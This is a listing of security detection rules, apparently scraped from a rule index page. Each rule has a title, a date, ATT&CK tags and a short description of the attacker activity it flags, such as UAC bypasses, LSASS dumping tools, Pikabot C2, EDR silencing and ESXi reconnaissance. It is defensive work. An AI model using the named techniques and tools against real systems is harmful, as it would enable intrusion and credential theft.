    Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.

  • Suspicious File Download From IP Via Wget.EXE - Paths

    Jan 6, 2025 · attack.execution

    Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe.

  • Suspicious File Encoded To Base64 Via Certutil.EXE

    Jan 6, 2025 · attack.defense-evasion attack.t1027

    Detects the execution of certutil with the "encode" flag to encode a file to base64 where the file's extension is suspicious.

  • Suspicious Invoke-WebRequest Execution

    Jan 6, 2025 · attack.command-and-control attack.t1105

    Detects a suspicious call to the Invoke-WebRequest cmdlet where the output is located in a suspicious location.

  • Unsigned DLL Loaded by Windows Utility

    Jan 6, 2025 · attack.t1218.011 attack.t1218.010 attack.defense-evasion

    Detects Windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.

  • Suspicious Non PowerShell WSMAN COM Provider

    Dec 28, 2024 · attack.execution attack.t1059.001 attack.lateral-movement attack.t1021.003

    Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.

  • BITS Transfer Job With Uncommon Or Suspicious Remote TLD

    Dec 27, 2024 · attack.defense-evasion attack.persistence attack.t1197

    Detects a suspicious download using the BITS client from an FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.

  • CodeIntegrity - Unmet Signing Level Requirements By File Under Validation

    Dec 27, 2024 · attack.execution

    Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation.

  • Relevant Anti-Virus Signature Keywords In Application Log

    Dec 27, 2024 · attack.resource-development attack.t1588

    Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.

  • Uncommon AppX Package Locations

    Dec 27, 2024 · attack.defense-evasion

    Detects an AppX package located in an uncommon location being added to the pipeline of "to be processed" packages.

  • Suspicious Windows Service Tampering

    Dec 27, 2024 · attack.defense-evasion attack.t1489 attack.t1562.001

    Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc., as seen being used in some ransomware scripts.

  • DNS Query To Remote Access Software Domain From Non-Browser App

    Dec 19, 2024 · attack.command-and-control attack.t1219

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

  • New AWS Lambda Function URL Configuration Created

    Dec 19, 2024 · attack.initial-access attack.privilege-escalation

    Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.

  • AWS SAML Provider Deletion Activity

    Dec 19, 2024 · attack.t1078.004 attack.privilege-escalation attack.t1531

    Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators to make it difficult for them to work and investigate at the time of the attack and after it.

  • Register new Logon Process by Rubeus

    Dec 19, 2024 · attack.lateral-movement attack.privilege-escalation attack.credential-access attack.t1558.003

    Detects potential use of Rubeus via the registration of a new trusted logon process.

  • AWS Key Pair Import Activity

    Dec 19, 2024 · attack.initial-access attack.t1078 attack.persistence attack.privilege-escalation

    Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.

  • DNS Query Request By QuickAssist.EXE

    Dec 19, 2024 · attack.initial-access attack.t1071.001 attack.t1210

    Detects DNS queries initiated by "QuickAssist.exe" to the Microsoft Quick Assist primary endpoint, which is used to establish a session.

  • QuickAssist Execution

    Dec 19, 2024 · attack.command-and-control attack.t1219

    Detects the execution of the Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.

  • Potential Secure Deletion with SDelete

    Dec 14, 2024 · attack.impact attack.defense-evasion attack.t1070.004 attack.t1027.005 attack.t1485 attack.t1553.002 attack.s0195

    Detects files that have extensions commonly seen while SDelete is used to wipe files.

  • COM Object Hijacking Via Modification Of Default System CLSID Default Value

    Dec 14, 2024 · attack.persistence attack.t1546.015

    Detects potential COM object hijacking via modification of a default system CLSID.

  • Local System Accounts Discovery - Linux

    Dec 14, 2024 · attack.discovery attack.t1087.001

    Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

  • Remote Access Tool Services Have Been Installed - Security

    Dec 7, 2024 · attack.persistence attack.t1543.003 attack.t1569.002

    Detects service installation of different remote access tool software. Such software is often abused by threat actors to perform

  • Modification or Deletion of an AWS RDS Cluster

    Dec 6, 2024 · attack.exfiltration attack.t1020

    Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.

  • NetNTLM Downgrade Attack - Registry

    Dec 3, 2024 · attack.defense-evasion attack.t1562.001 attack.t1112

    Detects a NetNTLM downgrade attack.

  • Potential Defense Evasion Via Rename Of Highly Relevant Binaries

    Dec 3, 2024 · attack.defense-evasion attack.t1036.003 car.2013-05-009

    Detects the execution of a renamed binary often used by attackers or malware, leveraging the new Sysmon OriginalFileName data point.

  • Always Install Elevated Windows Installer

    Dec 1, 2024 · attack.privilege-escalation attack.t1548.002

    Detects the Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privileges.

  • CMSTP UAC Bypass via COM Object Access

    Dec 1, 2024 · attack.execution attack.defense-evasion attack.privilege-escalation attack.t1548.002 attack.t1218.003 attack.g0069 car.2019-04-001

    Detects a UAC bypass attempt using Microsoft Connection Manager Profile Installer autoelevate-capable COM objects (e.g. UACMe ID 41, 43, 58 or 65).

  • Exploiting CVE-2019-1388

    Dec 1, 2024 · attack.privilege-escalation attack.t1068 cve.2019-1388 detection.emerging-threats

    Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM.

  • Msiexec Quiet Installation

    Dec 1, 2024 · attack.defense-evasion attack.t1218.007

    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).

  • Non-privileged Usage of Reg or Powershell

    Dec 1, 2024 · attack.defense-evasion attack.t1112

    Searches for usage of reg or PowerShell by non-privileged users to modify service configuration in the registry.

  • Permission Check Via Accesschk.EXE

    Dec 1, 2024 · attack.discovery attack.t1069.001

    Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by Sysinternals and often abused by attackers to verify process privileges.

  • Possible Privilege Escalation via Weak Service Permissions

    Dec 1, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574.011

    Detects the sc.exe utility being spawned by a user with Medium integrity level to change a service's ImagePath or FailureCommand.

  • Potential CVE-2021-41379 Exploitation Attempt

    Dec 1, 2024 · attack.privilege-escalation attack.t1068 cve.2021-41379 detection.emerging-threats

    Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of the Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights.

  • Potential Privilege Escalation via Service Permissions Weakness

    Dec 1, 2024 · attack.privilege-escalation attack.t1574.011

    Detects modification of service configuration (ImagePath, FailureCommand and ServiceDLL) in the registry by processes with Medium integrity level.

  • Potential RDP Session Hijacking Activity

    Dec 1, 2024 · attack.execution

    Detects potential RDP session hijacking activity on Windows systems.

  • Potential UAC Bypass Via Sdclt.EXE

    Dec 1, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002

    A general detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for UAC bypass techniques.

  • Suspicious Child Process Created as System

    Dec 1, 2024 · attack.privilege-escalation attack.t1134.002

    Detects child processes spawned with SYSTEM privileges by parents running as the LOCAL SERVICE or NETWORK SERVICE accounts.

  • Suspicious High IntegrityLevel Conhost Legacy Option

    Dec 1, 2024 · attack.defense-evasion attack.t1202

    ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.

  • Suspicious Process By Web Server Process

    Dec 1, 2024 · attack.persistence attack.t1505.003 attack.t1190

    Detects potentially suspicious processes being spawned by a web server process, which could be the result of a successfully placed web shell or exploitation.

  • Suspicious RazerInstaller Explorer Subprocess

    Dec 1, 2024 · attack.privilege-escalation attack.t1553 detection.emerging-threats

    Detects an explorer.exe subprocess of the RazerInstaller software, which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM.

  • Suspicious Scheduled Task Creation via Masqueraded XML File

    Dec 1, 2024 · attack.defense-evasion attack.persistence attack.t1036.005 attack.t1053.005

    Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of a potential defense evasion attempt during persistence.

  • Suspicious SYSTEM User Process Creation

    Dec 1, 2024 · attack.credential-access attack.defense-evasion attack.privilege-escalation attack.t1134 attack.t1003 attack.t1027

    Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter).

  • UAC Bypass Abusing Winsat Path Parsing - Process

    Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects the pattern of UAC bypass using a path parsing issue in winsat.exe (UACMe 52).

  • UAC Bypass Tools Using ComputerDefaults

    Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59).

  • UAC Bypass Using ChangePK and SLUI

    Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61).

  • UAC Bypass Using Consent and Comctl32 - Process

    Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects the pattern of UAC bypass using consent.exe and comctl32.dll (UACMe 22).

  • UAC Bypass Using Disk Cleanup

    Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects the pattern of UAC bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34).

  • UAC Bypass Using DismHost

    Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects the pattern of UAC bypass using DismHost DLL hijacking (UACMe 63).

  • UAC Bypass Using IDiagnostic Profile

    Dec 1, 2024 · attack.execution attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects the "IDiagnosticProfileUAC" UAC bypass technique.

  • UAC Bypass Using IEInstal - Process

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)


    Read More
  • UAC Bypass Using MSConfig Token Modification - Process

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)


    Read More
  • UAC Bypass Using NTFS Reparse Point - Process

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)


    Read More
  • UAC Bypass Using PkgMgr and DISM

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)


    Read More
  • UAC Bypass Using Windows Media Player - Process

    Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

  • UAC Bypass WSReset

    Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects the pattern of UAC Bypass via WSReset (detectable with the default sysmon-config)

  • Setup16.EXE Execution With Custom .Lst File

    Dec 1, 2024 · attack.defense-evasion attack.t1574.005

    Detects the execution of "Setup16.EXE", an old installation utility, with a custom ".lst" file. These ".lst" files can contain references to external programs that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living-off-the-land utility.

  • Suspicious ShellExec_RunDLL Call Via Ordinal

    Dec 1, 2024 · attack.defense-evasion attack.t1218.011

    Detects a suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through its ordinal number to launch other commands. Adversaries might use only the ordinal number in order to bypass existing detections that alert on the usage of ShellExec_RunDLL on the command line.

  • Suspicious Usage Of ShellExec_RunDLL

    Dec 1, 2024 · attack.defense-evasion

    Detects suspicious usage of the ShellExec_RunDLL function to launch other commands, as seen in the raspberry-robin attack

  • Password Policy Discovery - Linux

    Dec 1, 2024 · attack.discovery attack.t1201

    Detects password policy discovery commands

  • File and Directory Discovery - Linux

    Dec 1, 2024 · attack.discovery attack.t1083

    Detects usage of system utilities such as "find", "tree", "findmnt", etc., to discover files, directories and network shares.

  • System Owner or User Discovery - Linux

    Dec 1, 2024 · attack.discovery attack.t1033

    Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

  • All Rules Have Been Deleted From The Windows Firewall Configuration

    Dec 1, 2024 · attack.defense-evasion attack.t1562.004

    Detects when all the rules have been deleted from the Windows Defender Firewall configuration

  • CodePage Modification Via MODE.COM To Russian Language

    Dec 1, 2024 · attack.defense-evasion attack.t1036

    Detects a CodePage modification to the Russian language using the "mode.com" utility. This behavior has been used by threat actors behind Dharma ransomware.

  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process

    Dec 1, 2024 · detection.emerging-threats attack.execution attack.t1203 cve.2023-38331

    Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.

  • GCP Access Policy Deleted

    Dec 1, 2024 · attack.persistence attack.privilege-escalation attack.t1098

    Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.

  • GCP Break-glass Container Workload Deployed

    Dec 1, 2024 · attack.defense-evasion attack.t1548

    Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.

  • Google Workspace Application Access Level Modified

    Dec 1, 2024 · attack.persistence attack.privilege-escalation attack.t1098.003

    Detects when an access level is changed for a Google Workspace application. An access level is part of BeyondCorp Enterprise, which is Google Workspace's way of enforcing a Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google Workspace resources.

  • HackTool - EDRSilencer Execution - Filter Added

    Dec 1, 2024 · attack.defense-evasion attack.t1562

    Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.

  • HackTool - SharpMove Tool Execution

    Dec 1, 2024 · attack.lateral-movement attack.t1021.002

    Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.

  • HackTool - SOAPHound Execution

    Dec 1, 2024 · attack.discovery attack.t1087

    Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.

  • Peach Sandstorm APT Process Activity Indicators

    Dec 1, 2024 · attack.execution detection.emerging-threats

    Detects process creation activity related to Peach Sandstorm APT

  • Potential Dropper Script Execution Via WScript/CScript

    Dec 1, 2024 · attack.execution attack.t1059.005 attack.t1059.007

    Detects wscript/cscript executions of scripts located in user directories

  • Potential Peach Sandstorm APT C2 Communication Activity

    Dec 1, 2024 · attack.command-and-control detection.emerging-threats

    Detects potential C2 communication activity related to Peach Sandstorm APT

  • Potential Persistence Via MyComputer Registry Keys

    Dec 1, 2024 · attack.persistence

    Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)

  • Potential Pikabot C2 Activity

    Dec 1, 2024 · attack.command-and-control attack.t1573 detection.emerging-threats

    Detects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.

  • Potential Pikabot Discovery Activity

    Dec 1, 2024 · attack.discovery attack.t1016 attack.t1049 attack.t1087 detection.emerging-threats

    Detects system discovery activity carried out by Pikabot, including network, user and domain group information. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).

  • Potential Pikabot Hollowing Activity

    Dec 1, 2024 · attack.defense-evasion attack.t1055.012 detection.emerging-threats

    Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries.

  • Potentially Suspicious Self Extraction Directive File Created

    Dec 1, 2024 · attack.defense-evasion attack.t1218

    Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stands for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self-extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple ini files and not PE binaries.

  • PowerShell Core DLL Loaded By Non PowerShell Process

    Dec 1, 2024 · attack.t1059.001 attack.execution

    Detects loading of essential DLLs used by PowerShell by a non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.

  • PUA - PingCastle Execution

    Dec 1, 2024 · attack.reconnaissance attack.t1595

    Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.

  • PUA - PingCastle Execution From Potentially Suspicious Parent

    Dec 1, 2024 · attack.reconnaissance attack.t1595

    Detects the execution of PingCastle (a tool designed to quickly assess the Active Directory security level) via a script located in a potentially suspicious or uncommon location.

  • Remote CHM File Download/Execution Via HH.EXE

    Dec 1, 2024 · attack.defense-evasion attack.t1218.001

    Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.

  • Remote Thread Creation In Mstsc.Exe From Suspicious Location

    Dec 1, 2024 · attack.credential-access

    Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.

  • Renamed PingCastle Binary Execution

    Dec 1, 2024 · attack.execution attack.t1059 attack.defense-evasion attack.t1202

    Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.

  • Self Extraction Directive File Created In Potentially Suspicious Location

    Dec 1, 2024 · attack.defense-evasion attack.t1218

    Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self-extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.

  • Suspicious Processes Spawned by Java.EXE

    Dec 1, 2024 · attack.initial-access attack.persistence attack.privilege-escalation

    Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)

  • System Control Panel Item Loaded From Uncommon Location

    Dec 1, 2024 · attack.defense-evasion attack.t1036

    Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.

  • System Disk And Volume Reconnaissance Via Wmic.EXE

    Dec 1, 2024 · attack.execution attack.discovery attack.t1047 attack.t1082

    An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the wmic command-line utility and has been observed being used by threat actors such as Volt Typhoon.

  • Uncommon Connection to Active Directory Web Services

    Dec 1, 2024 · attack.discovery attack.t1087

    Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.

  • Windows Filtering Platform Blocked Connection From EDR Agent Binary

    Dec 1, 2024 · attack.defense-evasion attack.t1562

    Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.

  • Creation of WerFault.exe/Wer.dll in Unusual Folder

    Nov 29, 2024 · attack.persistence attack.defense-evasion attack.t1574.001

    Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.

  • GALLIUM IOCs

    Nov 25, 2024 · attack.credential-access attack.command-and-control attack.t1212 attack.t1071 attack.g0093 detection.emerging-threats

    Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.

  • HackTool - CoercedPotato Execution

    Nov 25, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055

    Detects the use of CoercedPotato, a tool for privilege escalation

  • HackTool - CreateMiniDump Execution

    Nov 25, 2024 · attack.credential-access attack.t1003.001

    Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine

  • HackTool - GMER Rootkit Detector and Remover Execution

    Nov 25, 2024 · attack.defense-evasion

    Detects the execution of the GMER tool based on image and hash fields.

  • HackTool - HandleKatz LSASS Dumper Execution

    Nov 25, 2024 · attack.credential-access attack.t1003.001

    Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same

  • HackTool - Impersonate Execution

    Nov 25, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1134.001 attack.t1134.003

    Detects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively

  • HackTool - LocalPotato Execution

    Nov 25, 2024 · attack.defense-evasion attack.privilege-escalation cve.2023-21746

    Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples

  • HackTool - PCHunter Execution

    Nov 25, 2024 · attack.execution attack.discovery attack.t1082 attack.t1057 attack.t1012 attack.t1083 attack.t1007

    Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low-level components

  • HackTool - PPID Spoofing SelectMyParent Tool Execution

    Nov 25, 2024 · attack.defense-evasion attack.t1134.004

    Detects the use of parent process ID spoofing tools like Didier Stevens' tool SelectMyParent

  • HackTool - SharpEvtMute DLL Load

    Nov 25, 2024 · attack.defense-evasion attack.t1562.002

    Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs

  • HackTool - Stracciatella Execution

    Nov 25, 2024 · attack.execution attack.defense-evasion attack.t1059 attack.t1562.001

    Detects Stracciatella, which executes a PowerShell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled, based on PE metadata characteristics.

  • HackTool - SysmonEOP Execution

    Nov 25, 2024 · cve.2022-41120 attack.t1068 attack.privilege-escalation

    Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120

  • HackTool - UACMe Akagi Execution

    Nov 25, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata

  • HackTool - Windows Credential Editor (WCE) Execution

    Nov 25, 2024 · attack.credential-access attack.t1003.001 attack.s0005

    Detects the use of Windows Credential Editor (WCE)

  • Hacktool Execution - Imphash

    Nov 25, 2024 · attack.credential-access attack.t1588.002 attack.t1003

    Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed

  • HackTool Named File Stream Created

    Nov 25, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004

    Detects the creation of a named file stream with the imphash of a well-known hack tool

  • Malicious DLL Load By Compromised 3CXDesktopApp

    Nov 25, 2024 · attack.defense-evasion detection.emerging-threats

    Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp

  • MpiExec Lolbin

    Nov 25, 2024 · attack.execution attack.defense-evasion attack.t1218

    Detects a certain command line flag combination used by the mpiexec.exe LOLBIN from the HPC pack that can be used to execute any other binary

  • Potential Compromised 3CXDesktopApp Execution

    Nov 25, 2024 · attack.defense-evasion attack.t1218 attack.execution detection.emerging-threats

    Detects execution of a known compromised version of 3CXDesktopApp

  • Potential SquiblyTwo Technique Execution

    Nov 25, 2024 · attack.defense-evasion attack.t1047 attack.t1220 attack.execution attack.t1059.005 attack.t1059.007

    Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields

  • PUA - Fast Reverse Proxy (FRP) Execution

    Nov 25, 2024 · attack.command-and-control attack.t1090

    Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.

  • PUA - Nimgrab Execution

    Nov 25, 2024 · attack.command-and-control attack.t1105

    Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.

  • PUA - NPS Tunneling Tool Execution

    Nov 25, 2024 · attack.command-and-control attack.t1090

    Detects the use of NPS, a port forwarding and intranet penetration proxy server

  • PUA - Process Hacker Driver Load

    Nov 25, 2024 · attack.privilege-escalation cve.2021-21551 attack.t1543

    Detects driver load of the Process Hacker tool

  • PUA - Process Hacker Execution

    Nov 25, 2024 · attack.defense-evasion attack.discovery attack.persistence attack.privilege-escalation attack.t1622 attack.t1564 attack.t1543

    Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.

  • PUA - System Informer Driver Load

    Nov 25, 2024 · attack.privilege-escalation attack.t1543

    Detects driver load of the System Informer tool

  • PUA - System Informer Execution

    Nov 25, 2024 · attack.persistence attack.privilege-escalation attack.discovery attack.defense-evasion attack.t1082 attack.t1564 attack.t1543

    Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations

  • PUA - IOX Tunneling Tool Execution

    Nov 25, 2024 · attack.command-and-control attack.t1090

    Detects the use of IOX - a tool for port forwarding and intranet proxy purposes

  • Remote Access Tool - NetSupport Execution From Unusual Location

    Nov 25, 2024 · attack.defense-evasion

    Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files')

  • Renamed AdFind Execution

    Nov 25, 2024 · attack.discovery attack.t1018 attack.t1087.002 attack.t1482 attack.t1069.002

    Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain.

  • Renamed AutoIt Execution

    Nov 25, 2024 · attack.defense-evasion attack.t1027

    Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.

  • Renamed NetSupport RAT Execution

    Nov 25, 2024 · attack.defense-evasion

    Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings

  • Renamed PAExec Execution

    Nov 25, 2024 · attack.defense-evasion attack.t1202

    Detects the execution of a renamed version of PAExec, which is often used by attackers

  • Vulnerable HackSys Extreme Vulnerable Driver Load

    Nov 25, 2024 · attack.privilege-escalation attack.t1543.003

    Detects the load of HackSys Extreme Vulnerable Driver, which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at the kernel level, and which is often abused by threat actors

  • Vulnerable WinRing0 Driver Load

    Nov 25, 2024 · attack.privilege-escalation attack.t1543.003

    Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation

  • WinDivert Driver Load

    Nov 25, 2024 · attack.collection attack.defense-evasion attack.t1599.001 attack.t1557.001

    Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows

  • ESXi Account Creation Via ESXCLI

    Nov 20, 2024 · attack.persistence attack.t1136

    Detects user account creation on ESXi system via esxcli

  • ESXi Admin Permission Assigned To Account Via ESXCLI

    Nov 20, 2024 · attack.execution

    Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.

  • ESXi Network Configuration Discovery Via ESXCLI

    Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007

    Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.

  • ESXi Storage Information Discovery Via ESXCLI

    Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007

    Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.

  • ESXi Syslog Configuration Change Via ESXCLI

    Nov 20, 2024 · attack.defense-evasion attack.t1562.001 attack.t1562.003

    Detects changes to the ESXi syslog configuration via "esxcli"

  • ESXi System Information Discovery Via ESXCLI

    Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007

    Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc.

  • ESXi VM Kill Via ESXCLI

    Nov 20, 2024 · attack.execution

    Detects execution of the "esxcli" command with the "vm" and "kill" flags in order to kill/shutdown a specific VM.

  • ESXi VM List Discovery Via ESXCLI

    Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007

    Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.

  • ESXi VSAN Information Discovery Via ESXCLI

    Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007

    Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.

  • App Assigned To Azure RBAC/Microsoft Entra Role

    Nov 20, 2024 · attack.persistence attack.privilege-escalation attack.t1098.003

    Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.

  • Potential File Extension Spoofing Using Right-to-Left Override

    Nov 18, 2024 · attack.execution attack.defense-evasion attack.t1036.002

    Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extension.

  • Potentially Suspicious Cabinet File Expansion

    Nov 17, 2024 · attack.defense-evasion attack.t1218

